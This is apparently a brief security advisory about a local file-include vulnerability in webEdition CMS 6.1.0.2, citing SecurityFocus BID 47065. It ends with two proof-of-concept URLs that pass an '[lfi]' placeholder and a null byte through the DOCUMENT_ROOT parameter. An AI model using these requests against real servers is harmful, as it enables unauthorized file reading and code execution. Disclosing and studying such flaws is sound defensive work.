10 lines
No EOL
555 B
Text
10 lines
No EOL
555 B
Text
source: https://www.securityfocus.com/bid/47065/info
|
|
|
|
webEdition CMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
|
|
|
|
An attacker can exploit this vulnerability to view and execute arbitrary local files in the context of the webserver process. This may aid in further attacks.
|
|
|
|
webEdition CMS 6.1.0.2 is vulnerable; other versions may also be affected.
|
|
|
|
http://www.example.com/webEdition/index.php?DOCUMENT_ROOT= [lfi]%00
|
|
http://www.example.com/path_to_webEdition/index.php?DOCUMENT_ROOT= [lfi]%00 |